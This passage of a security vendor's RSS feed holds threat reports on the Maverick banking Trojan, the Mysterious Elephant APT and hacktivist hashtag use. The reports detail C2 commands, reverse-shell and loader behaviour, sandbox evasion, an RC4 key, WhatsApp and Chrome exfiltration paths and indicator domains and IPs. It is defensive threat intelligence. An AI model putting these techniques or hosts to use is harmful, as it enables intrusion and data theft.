  471. <td>Enable remote connection and send multiple screenshots to the machine when they change (it computes a hash of each screenshot to ensure it is not the same image)</td>
  472. </tr>
  473. <tr>
  474. <td>TOOGLEINTERN</td>
  475. <td>Get a screenshot of a specific window</td>
  476. </tr>
  477. <tr>
  478. <td>GENERATEWINDOWLOCKED</td>
  479. <td>Lock the screen using one of the banks&#8217; home pages.</td>
  480. </tr>
  481. <tr>
  482. <td>LISTALLHANDLESOPENEDS</td>
  483. <td>Send all open handles to the server</td>
  484. </tr>
  485. <tr>
  486. <td>KILLPROCESS</td>
<td>Kill a process using its handle</td>
  488. </tr>
  489. <tr>
  490. <td>CLOSEHANDLE</td>
  491. <td>Close a handle</td>
  492. </tr>
  493. <tr>
  494. <td>MINIMIZEHANDLE</td>
  495. <td>Minimize a window using its handle</td>
  496. </tr>
  497. <tr>
  498. <td>MAXIMIZEHANDLE</td>
  499. <td>Maximize a window using its handle</td>
  500. </tr>
  501. <tr>
  502. <td>GENERATEWINDOWREQUEST</td>
  503. <td>Generate a phishing window asking for the victim&#8217;s credentials used by banks</td>
  504. </tr>
  505. <tr>
  506. <td>CANCELSCREENREQUEST</td>
  507. <td>Disable the phishing window</td>
  508. </tr>
  509. </tbody>
  510. </table>
  511. <p><strong>Agent profile info</strong></p>
  512. <p>In the &#8220;INFOCLIENT&#8221; command, the information sent to the C2 is as follows:</p>
  513. <ul>
  514. <li><strong>Agent ID:</strong> A SHA256 hash of all primary MAC addresses used by all interfaces</li>
  515. <li>Username</li>
  516. <li>Hostname</li>
  517. <li>Operating system version</li>
  518. <li>Client version (no value)</li>
  519. <li>Number of monitors</li>
  520. <li>Home page (home): &#8220;home&#8221; indicates which bank&#8217;s home screen should be used, sent before the Agent is decrypted by the banking application monitoring routine.</li>
  521. <li>Screen resolution</li>
  522. </ul>
  523. <h2 id="conclusion">Conclusion</h2>
<p>According to our telemetry, all victims were in Brazil, but the Trojan has the potential to spread to other countries, as an infected victim can send it to another location. Even so, the malware is designed to target only Brazilians at the moment.</p>
<p>It is evident that this threat is very sophisticated and complex; the entire execution chain is relatively new, but the final payload has many code overlaps and similarities with the Coyote banking Trojan, which we documented in 2024. However, some of the techniques are not exclusive to Coyote and have been observed in other low-profile banking Trojans written in .NET. The agent&#8217;s structure is also different from how Coyote operated; it did not use this architecture before.</p>
<p>It is very likely that Maverick is a new banking Trojan using shared code from Coyote, which may indicate that the developers of Coyote have completely refactored and rewritten a large part of their components.</p>
<p>This is one of the most complex infection chains we have ever detected, designed to load a banking Trojan. It has infected many people in Brazil, and its worm-like nature allows it to spread exponentially by exploiting a very popular instant messenger. The impact is enormous. Furthermore, it demonstrates the use of AI in the code-writing process, specifically in certificate decryption, which may also indicate the involvement of AI in the overall code development. Maverick works like any other banking Trojan, but the worrying aspects are its delivery method and its significant impact.</p>
<p>We have detected the entire infection chain since day one, preventing victim infection from the initial LNK file. Kaspersky products detect this threat with the verdict <strong>HEUR:Trojan.Multi.Powenot.a</strong> and <strong>HEUR:Trojan-Banker.MSIL.Maverick.gen.</strong></p>
  529. <h2 id="iocs">IoCs</h2>
  530. <table>
  531. <tbody>
  532. <tr>
<td>Domain</td>
  534. <td>IP</td>
  535. <td>ASN</td>
  536. </tr>
  537. <tr>
  538. <td><a href="https://opentip.kaspersky.com/casadecampoamazonas.com/?icid=gl_sl_opentip_sm-team_9d1b9de83ae3bad6&#038;utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener"><strong>casadecampoamazonas[.]com</strong></a></td>
  539. <td>181.41.201.184</td>
  540. <td>212238</td>
  541. </tr>
  542. <tr>
  543. <td><a href="https://opentip.kaspersky.com/sorvetenopote.com/?icid=gl_sl_opentip_sm-team_153c14d9b642446a&#038;utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener"><strong>sorvetenopote[.]com</strong></a></td>
  544. <td>77.111.101.169</td>
  545. <td>396356</td>
  546. </tr>
  547. </tbody>
  548. </table>
  549. ]]></content:encoded>
  550. <wfw:commentRss>https://securelist.com/maverick-banker-distributing-via-whatsapp/117715/feed/</wfw:commentRss>
  551. <slash:comments>0</slash:comments>
  552. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15073641/SL-Maverick-Brazilian-banker-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  553. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15073641/SL-Maverick-Brazilian-banker-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  554. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15073641/SL-Maverick-Brazilian-banker-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  555. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15073641/SL-Maverick-Brazilian-banker-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  556. </item>
  557. <item>
  558. <title>Mysterious Elephant: a growing threat</title>
  559. <link>https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/</link>
  560. <comments>https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/#respond</comments>
  561. <dc:creator><![CDATA[Noushin Shabab, Ye Jin]]></dc:creator>
  562. <pubDate>Wed, 15 Oct 2025 10:00:11 +0000</pubDate>
  563. <category><![CDATA[APT reports]]></category>
  564. <category><![CDATA[GReAT research]]></category>
  565. <category><![CDATA[Malware Technologies]]></category>
  566. <category><![CDATA[Targeted attacks]]></category>
  567. <category><![CDATA[Google Chrome]]></category>
  568. <category><![CDATA[Malware Descriptions]]></category>
  569. <category><![CDATA[Spear phishing]]></category>
  570. <category><![CDATA[Malware]]></category>
  571. <category><![CDATA[APT]]></category>
  572. <category><![CDATA[RAT Trojan]]></category>
  573. <category><![CDATA[Backdoor]]></category>
  574. <category><![CDATA[WhatsApp]]></category>
  575. <category><![CDATA[Data theft]]></category>
  576. <category><![CDATA[Defense evasion]]></category>
  577. <category><![CDATA[TTPs]]></category>
  578. <category><![CDATA[APAC]]></category>
  579. <category><![CDATA[RC4]]></category>
  580. <category><![CDATA[APT (Targeted attacks)]]></category>
  581. <category><![CDATA[Windows malware]]></category>
  582. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117596</guid>
  583.  
  584. <description><![CDATA[Kaspersky GReAT experts describe the latest Mysterious Elephant APT activity. The threat actor exfiltrates data related to WhatsApp and employs tools such as BabShell and MemLoader HidenDesk.]]></description>
  585. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30145442/mysterious-elephant-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  586. <p>Mysterious Elephant is a highly active advanced persistent threat (APT) group that we at Kaspersky GReAT discovered in 2023. It has been consistently evolving and adapting its tactics, techniques, and procedures (TTPs) to stay under the radar. With a primary focus on targeting government entities and foreign affairs sectors in the Asia-Pacific region, the group has been using a range of sophisticated tools and techniques to infiltrate and exfiltrate sensitive information. Notably, Mysterious Elephant has been exploiting WhatsApp communications to steal sensitive data, including documents, pictures, and archive files.</p>
  587. <p>The group&#8217;s latest campaign, which began in early 2025, reveals a significant shift in their TTPs, with an increased emphasis on using new custom-made tools as well as customized open-source tools, such as BabShell and MemLoader modules, to achieve their objectives. In this report, we will delve into the history of Mysterious Elephant&#8217;s attacks, their latest tactics and techniques, and provide a comprehensive understanding of this threat.</p>
  588. <h2 id="the-emergence-of-mysterious-elephant">The emergence of Mysterious Elephant</h2>
  589. <p>Mysterious Elephant is a threat actor <a href="https://securelist.com/apt-trends-report-q2-2023/110231/#mysterious-elephant" target="_blank" rel="noopener">we&#8217;ve been tracking since 2023</a>. Initially, its intrusions resembled those of the Confucius threat actor. However, further analysis revealed a more complex picture. We found that Mysterious Elephant&#8217;s malware contained code from multiple APT groups, including Origami Elephant, Confucius, and SideWinder, which suggested deep collaboration and resource sharing between teams. Notably, our research indicates that the tools and code borrowed from the aforementioned APT groups were previously used by their original developers, but have since been abandoned or replaced by newer versions. However, Mysterious Elephant has not only adopted these tools, but also continued to maintain, develop, and improve them, incorporating the code into their own operations and creating new, advanced versions. The actor&#8217;s early attack chains featured distinctive elements, such as remote template injections and exploitation of <a href="https://www.cve.org/CVERecord?id=CVE-2017-11882" target="_blank" rel="noopener">CVE-2017-11882</a>, followed by the use of a downloader called &#8220;Vtyrei&#8221;, which was previously connected to Origami Elephant and later abandoned by this group. Over time, Mysterious Elephant has continued to upgrade its tools and expand its operations, eventually earning its designation as a previously unidentified threat actor.</p>
  590. <h2 id="latest-campaign">Latest campaign</h2>
  591. <p>The group&#8217;s latest campaign, which was discovered in early 2025, reveals a significant shift in their TTPs. They are now using a combination of exploit kits, phishing emails, and malicious documents to gain initial access to their targets. Once inside, they deploy a range of custom-made and open-source tools to achieve their objectives. In the following sections, we&#8217;ll delve into the latest tactics and techniques used by Mysterious Elephant, including their new tools, infrastructure, and victimology.</p>
  592. <h3 id="spear-phishing">Spear phishing</h3>
  593. <p>Mysterious Elephant has started using spear phishing techniques to gain initial access. Phishing emails are tailored to each victim and are convincingly designed to mimic legitimate correspondence. The primary targets of this APT group are countries in the South Asia (SA) region, particularly Pakistan. Notably, this APT organization shows a strong interest and inclination towards diplomatic institutions, which is reflected in the themes covered by the threat actor&#8217;s spear phishing emails, as seen in bait attachments.</p>
  594. <div id="attachment_117597" style="width: 690px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117597" class="size-full wp-image-117597" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1.png" alt="Spear phishing email used by Mysterious Elephant" width="680" height="617" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1.png 680w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1-300x272.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1-386x350.png 386w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1-309x280.png 309w" sizes="auto, (max-width: 680px) 100vw, 680px" /></a><p id="caption-attachment-117597" class="wp-caption-text">Spear phishing email used by Mysterious Elephant</p></div>
  595. <p>For example, the decoy document above concerns Pakistan&#8217;s application for a non-permanent seat on the United Nations Security Council for the 2025–2026 term.</p>
  596. <h3 id="malicious-tools">Malicious tools</h3>
  597. <p>Mysterious Elephant&#8217;s toolkit is a noteworthy aspect of their operations. The group has switched to using a variety of custom-made and open-source tools instead of employing known malware to achieve their objectives.</p>
  598. <h4 id="powershell-scripts">PowerShell scripts</h4>
  599. <p>The threat actor uses PowerShell scripts to execute commands, deploy additional payloads, and establish persistence. These scripts are loaded from C2 servers and often use legitimate system administration tools, such as curl and certutil, to download and execute malicious files.</p>
  600. <div id="attachment_117598" style="width: 696px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101409/mysterious-elephant2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117598" class="size-full wp-image-117598" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101409/mysterious-elephant2.png" alt="Malicious PowerShell script seen in Mysterious Elephant's 2025 attacks" width="686" height="138" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101409/mysterious-elephant2.png 686w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101409/mysterious-elephant2-300x60.png 300w" sizes="auto, (max-width: 686px) 100vw, 686px" /></a><p id="caption-attachment-117598" class="wp-caption-text">Malicious PowerShell script seen in Mysterious Elephant&#8217;s 2025 attacks</p></div>
  601. <p>For example, the script above is used to download the next-stage payload and save it as <code>ping.exe</code>. It then schedules a task to execute the payload and send the results back to the C2 server. The task is set to run automatically in response to changes in the network profile, ensuring persistence on the compromised system. Specifically, it is triggered by network profile-related events (Microsoft-Windows-NetworkProfile/Operational), which can indicate a new network connection. A four-hour delay is configured after the event, likely to help evade detection.</p>
  602. <h4 id="babshell">BabShell</h4>
  603. <p>One of the most recent tools used by Mysterious Elephant is BabShell. This is a reverse shell tool written in C++ that enables attackers to connect to a compromised system. Upon execution, it gathers system information, including username, computer name, and MAC address, to identify the machine. The malware then enters an infinite loop of performing the following steps:</p>
  604. <ol>
  605. <li>It listens for and receives commands from the attacker-controlled C2 server.</li>
  606. <li>For each received command, BabShell creates a separate thread to execute it, allowing for concurrent execution of multiple commands.</li>
  607. <li>The output of each command is captured and saved to a file named <code>output_[timestamp].txt</code>, where [timestamp] is the current time. This allows the attacker to review the results of the commands.</li>
  608. <li>The contents of the <code>output_[timestamp].txt</code> file are then transmitted back to the C2 server, providing the attacker with the outcome of the executed commands and enabling them to take further actions, for instance, deploy a next-stage payload or execute additional malicious instructions.</li>
  609. </ol>
  610. <p>BabShell uses the following commands to execute command-line instructions and additional payloads it receives from the server:</p>
  611. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117599" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3.png" alt="" width="808" height="76" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3.png 808w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3-300x28.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3-768x72.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3-800x75.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3-740x70.png 740w" sizes="auto, (max-width: 808px) 100vw, 808px" /></a></p>
  612. <h4 id="customized-open-source-tools">Customized open-source tools</h4>
  613. <p>One of the latest modules used by Mysterious Elephant and loaded by BabShell is MemLoader HidenDesk.</p>
  614. <p>MemLoader HidenDesk is a reflective PE loader that loads and executes malicious payloads in memory. It uses encryption and compression to evade detection.</p>
  615. <p>MemLoader HidenDesk operates in the following manner:</p>
  616. <ol>
  617. <li>The malware checks the number of active processes and terminates itself if there are fewer than 40 processes running — a technique used to evade sandbox analysis.</li>
  618. <li>It creates a shortcut to its executable and saves it in the autostart folder, ensuring it can restart itself after a system reboot.</li>
  619. <li>The malware then creates a hidden desktop named &#8220;MalwareTech_Hidden&#8221; and switches to it, providing a covert environment for its activities. This technique is borrowed from an open-source project on GitHub.</li>
  620. <li>Using an RC4-like algorithm with the key <code>D12Q4GXl1SmaZv3hKEzdAhvdBkpWpwcmSpcD</code>, the malware decrypts a block of data from its own binary and executes it in memory as shellcode. The shellcode&#8217;s sole purpose is to load and execute a PE file, specifically a sample of the commercial RAT called &#8220;Remcos&#8221; (MD5: 037b2f6233ccc82f0c75bf56c47742bb).</li>
  621. </ol>
  622. <p>Another recent loader malware used in the latest campaign is MemLoader Edge.</p>
  623. <p>MemLoader Edge is a malicious loader that embeds a sample of the VRat backdoor, utilizing encryption and evasion techniques.</p>
  624. <p>It operates in the following manner:</p>
  625. <ol>
  626. <li>The malware performs a network connectivity test by attempting to connect to the legitimate website <code>bing.com:445</code>, which is likely to fail since port 445 is not open on the server side. If the test were to succeed, suggesting that the loader is possibly in an emulation or sandbox environment, the malware would drop an embedded picture on the machine and display a popup window with three unresponsive mocked-up buttons, then enter an infinite loop. This is done to complicate detection and analysis.</li>
  627. <li>If the connection attempt fails, the malware iterates through a 1016-byte array to find the correct XOR keys for decrypting the embedded PE file in two rounds. The process continues until the decrypted data matches the byte sequence of <code>MZ\x90</code>, indicating that the real XOR keys are found within the array.</li>
  628. <li>If the malware is unable to find the correct XOR keys, it will display the same picture and popup window as before, followed by a message box containing an error message after the window is closed.</li>
  629. <li>Once the PE file is successfully decrypted, it is loaded into memory using reflective loading techniques. The decrypted PE file is based on the open-source RAT vxRat, which is referred to as VRat due to the PDB string found in the sample:<br />
  630. <pre class="urvanov-syntax-highlighter-plain-tag">C:\Users\admin\source\repos\vRat_Client\Release\vRat_Client.pdb</pre>
  631. </li>
  632. </ol>
  633. <h4 id="whatsapp-specific-exfiltration-tools">WhatsApp-specific exfiltration tools</h4>
  634. <p>Spying on WhatsApp communications is a key aspect of the exfiltration modules employed by Mysterious Elephant. They are designed to steal sensitive data from compromised systems. The attackers have implemented WhatsApp-specific features into their exfiltration tools, allowing them to target files shared through the WhatsApp application and exfiltrate valuable information, including documents, pictures, archive files, and more. These modules employ various techniques, such as recursive directory traversal, XOR decryption, and Base64 encoding, to evade detection and upload the stolen data to the attackers&#8217; C2 servers.</p>
  635. <ul>
  636. <li><strong>Uplo Exfiltrator</strong></li>
  637. </ul>
  638. <p>The Uplo Exfiltrator is a data exfiltration tool that targets specific file types and uploads them to the attackers&#8217; C2 servers. It uses a simple XOR decryption to deobfuscate C2 domain paths and employs a recursive <a href="https://en.wikipedia.org/wiki/Depth-first_search" target="_blank" rel="noopener">depth-first directory traversal algorithm</a> to identify valuable files. The malware specifically targets file types that are likely to contain potentially sensitive data, including documents, spreadsheets, presentations, archives, certificates, contacts, and images. The targeted file extensions include .TXT, .DOC, .DOCX, .PDF, .XLS, .XLSX, .CSV, .PPT, .PPTX, .ZIP, .RAR, .7Z, .PFX, .VCF, .JPG, .JPEG, and .AXX.</p>
  639. <ul>
  640. <li><strong>Stom Exfiltrator</strong></li>
  641. </ul>
  642. <p>The Stom Exfiltrator is a commonly used exfiltration tool that recursively searches specific directories, including the &#8220;Desktop&#8221; and &#8220;Downloads&#8221; folders, as well as all drives except the C drive, to collect files with predefined extensions. Its latest variant is specifically designed to target files shared through the WhatsApp application. This version uses a hardcoded folder path to locate and exfiltrate such files:</p><pre class="urvanov-syntax-highlighter-plain-tag">%AppData%\\Packages\\xxxxx.WhatsAppDesktop_[WhatsApp ID]\\LocalState\\Shared\\transfers\\</pre>
  643. <p>The targeted file extensions include .PDF, .DOCX, .TXT, .JPG, .PNG, .ZIP, .RAR, .PPTX, .DOC, .XLS, .XLSX, .PST, and .OST.</p>
  644. <ul>
  645. <li><strong>ChromeStealer Exfiltrator</strong></li>
  646. </ul>
  647. <p>The ChromeStealer Exfiltrator is another exfiltration tool used by Mysterious Elephant that targets Google Chrome browser data, including cookies, tokens, and other sensitive information. It searches specific directories within the Chrome user data of the most recently used Google Chrome profile, including the IndexedDB directory and the &#8220;Local Storage&#8221; directory. The malware uploads all files found in these directories to the attacker-controlled C2 server, potentially exposing sensitive data like chat logs, contacts, and authentication tokens. The response from the C2 server suggests that this tool was also used to steal files related to WhatsApp. The ChromeStealer Exfiltrator employs string obfuscation to evade detection.</p>
  648. <h2 id="infrastructure">Infrastructure</h2>
  649. <p>Mysterious Elephant&#8217;s infrastructure is a network of domains and IP addresses. The group has been using a range of techniques, including wildcard DNS records, to generate unique domain names for each request. This makes it challenging for security researchers to track and monitor their activities. The attackers have also been using virtual private servers (VPS) and cloud services to host their infrastructure. This allows them to easily scale and adapt their operations to evade detection. According to our data, this APT group has utilized the services of numerous VPS providers in their operations. Nevertheless, our analysis of the statistics has revealed that Mysterious Elephant appears to have a preference for certain VPS providers.</p>
  651. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>VPS providers most commonly used by Mysterious Elephant (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30102127/mysterious-elephant4.png" target="_blank" rel="noopener">download</a>)</em></p>
  652. <h2 id="victimology">Victimology</h2>
  653. <p>Mysterious Elephant&#8217;s primary targets are government entities and foreign affairs sectors in the Asia-Pacific region. The group has been focusing on Pakistan, Bangladesh, and Sri Lanka, with a lower number of victims in other countries. The attackers have been using highly customized payloads tailored to specific individuals, highlighting their sophistication and focus on targeted attacks.</p>
  654. <p>The group&#8217;s victimology is characterized by a high degree of specificity. Attackers often use personalized phishing emails and malicious documents to gain initial access. Once inside, they employ a range of tools and techniques to escalate privileges, move laterally, and exfiltrate sensitive information.</p>
  655. <ul>
  656. <li>Most targeted countries: Pakistan, Bangladesh, Afghanistan, Nepal and Sri Lanka</li>
  657. </ul>
  659. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Countries targeted most often by Mysterious Elephant (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14095041/02-en-mysterious-elephant-charts.png" target="_blank" rel="noopener">download</a>)</em></p>
  660. <ul>
  661. <li>Primary targets: government entities and foreign affairs sectors</li>
  662. </ul>
  664. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Industries most targeted by Mysterious Elephant (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13125733/03-en-mysterious-elephant-charts.png" target="_blank" rel="noopener">download</a>)</em></p>
  665. <h2 id="conclusion">Conclusion</h2>
  666. <p>In conclusion, Mysterious Elephant is a highly sophisticated and active Advanced Persistent Threat group that poses a significant threat to government entities and foreign affairs sectors in the Asia-Pacific region. Through their continuous evolution and adaptation of tactics, techniques, and procedures, the group has demonstrated the ability to evade detection and infiltrate sensitive systems. The use of custom-made and open-source tools, such as BabShell and MemLoader, highlights their technical expertise and willingness to invest in developing advanced malware.</p>
  667. <p>The group&#8217;s focus on targeting specific organizations, combined with their ability to tailor their attacks to specific victims, underscores the severity of the threat they pose. The exfiltration of sensitive information, including documents, pictures, and archive files, can have significant consequences for national security and global stability.</p>
  668. <p>To counter the Mysterious Elephant threat, it is essential for organizations to implement <a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext____b31b3f3de449f764" target="_blank" rel="noopener">robust security measures</a>, including regular software updates, <a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kata____86b6b7fe75e32725" target="_blank" rel="noopener">network monitoring</a>, and <a href="https://asap.kaspersky.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kasap____b3c004b7eec21817" target="_blank" rel="noopener">employee training</a>. Additionally, international cooperation and information sharing among cybersecurity professionals, governments, and industries are crucial in tracking and disrupting the group&#8217;s activities.</p>
  669. <p>Ultimately, staying ahead of Mysterious Elephant and other APT groups requires a proactive and collaborative approach to cybersecurity. By understanding their TTPs, sharing threat intelligence, and implementing effective countermeasures, we can reduce the risk of successful attacks and protect sensitive information from falling into the wrong hands.</p>
  670. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  671. <h3 id="file-hashes">File hashes</h3>
  694. <h3 id="domains-ips">Domains/IPs</h3>
  708. ]]></content:encoded>
  709. <wfw:commentRss>https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/feed/</wfw:commentRss>
  710. <slash:comments>0</slash:comments>
  711. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30145442/mysterious-elephant-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  712. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30145442/mysterious-elephant-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  713. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30145442/mysterious-elephant-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  714. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30145442/mysterious-elephant-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  715. </item>
  716. <item>
  717. <title>Signal in the noise: what hashtags reveal about hacktivism in 2025</title>
  718. <link>https://securelist.com/dfi-meta-hacktivist-report/117708/</link>
  719. <comments>https://securelist.com/dfi-meta-hacktivist-report/117708/#respond</comments>
  720. <dc:creator><![CDATA[Kaspersky Security Services]]></dc:creator>
  721. <pubDate>Tue, 14 Oct 2025 10:00:09 +0000</pubDate>
  722. <category><![CDATA[Research]]></category>
  723. <category><![CDATA[SOC, TI and IR posts]]></category>
  724. <category><![CDATA[Twitter]]></category>
  725. <category><![CDATA[Darknet]]></category>
  726. <category><![CDATA[Threat intelligence]]></category>
  727. <category><![CDATA[hacktivists]]></category>
  728. <category><![CDATA[Telegram]]></category>
  729. <category><![CDATA[Cybersecurity]]></category>
  730. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117708</guid>
  731.  
  732. <description><![CDATA[Kaspersky researchers identified over 2000 unique hashtags across 11,000 hacktivist posts on the surface web and the dark web to find out how hacktivist campaigns function and whom they target.]]></description>
  733. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14082820/SL-DFI-META-report-featured-1200-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>What do hacktivist campaigns look like in 2025? To answer this question, we analyzed more than 11,000 posts produced by over 120 hacktivist groups circulating across both the surface web and the dark web, with a particular focus on groups targeting MENA countries. The primary goal of our research is to highlight patterns in hacktivist operations, including attack methods, public warnings, and stated intent. The analysis is undertaken exclusively from a cybersecurity perspective and anchored in the principle of neutrality.</p>
  734. <p>Hacktivists are politically motivated threat actors who typically value visibility over sophistication. Their tactics are designed for maximum visibility, reach, and ease of execution, rather than stealth or technical complexity. The term &#8220;hacktivist&#8221; may refer to either the administrator of a community who initiates the attack or an ordinary subscriber who simply participates in the campaign.</p>
  735. <h2 id="key-findings">Key findings</h2>
  736. <p>While it may be assumed that most operations unfold on hidden forums, in fact, most hacktivist planning and mobilization happens in the open. Telegram has become the command center for today&#8217;s hacktivist groups, hosting the highest density of attack planning and calls to action. The second place is occupied by X (ex-Twitter).</p>
  737. <div id="attachment_117709" style="width: 790px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117709" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels.png" alt="Distribution of social media references in posts published in 2025" width="780" height="361" class="size-full wp-image-117709" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels.png 780w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels-300x139.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels-768x355.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels-756x350.png 756w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels-740x342.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels-605x280.png 605w" sizes="auto, (max-width: 780px) 100vw, 780px" /></a><p id="caption-attachment-117709" class="wp-caption-text">Distribution of social media references in posts published in 2025</p></div>
  738. <p>Although we focused on hacktivists operating in MENA, the targeting of the groups under review is global, extending well beyond the region. There are victims throughout Europe and the Middle East, as well as in Argentina, the United States, Indonesia, India, Vietnam, Thailand, Cambodia, Türkiye, and other countries.</p>
  739. <h3 id="hashtags-as-the-connective-tissue-of-hacktivist-operations">Hashtags as the connective tissue of hacktivist operations</h3>
  740. <p>One notable feature of hacktivist posts and messages on dark web sites is the frequent use of hashtags (#words). Used constantly, hashtags often serve as political slogans, amplifying messages, coordinating activity or claiming credit for attacks. The most common themes are political statements and hacktivist group names, though hashtags sometimes reference geographical locations, such as specific countries or cities.</p>
  741. <p>Hashtags also map alliances and momentum. We have identified 2063 unique tags in 2025: 1484 appearing for the first time, and many tied directly to specific groups or joint campaigns. Most tags are short-lived, lasting about two months, with &#8220;popular&#8221; ones persisting longer when amplified by alliances; channel bans contribute to attrition.</p>
  742. <p>Operationally, reports of completed attacks dominate hashtagged content (58%), and within those, DDoS is the workhorse (61%). Spikes in threatening rhetoric do not by themselves predict more attacks, but timing matters: when threats are published, they typically refer to actions in the near term, i.e. the same week or month, making early warning from open-channel monitoring materially useful.</p>
  743. <p>The full version of the report details the following findings:</p>
  744. <ul>
  745. <li>How long it typically takes for an attack to be reported after an initial threat post</li>
  746. <li>How hashtags are used to coordinate attacks or claim credit</li>
  747. <li>Patterns across campaigns and regions</li>
  748. <li>The types of cyberattacks being promoted or celebrated</li>
  749. </ul>
  750. <h2 id="practical-takeaways-and-recommendations">Practical takeaways and recommendations</h2>
  751. <p>For defenders and corporate leaders, we recommend the following:</p>
  752. <ul>
  753. <li>Prioritize scalable DDoS mitigation and proactive security measures.</li>
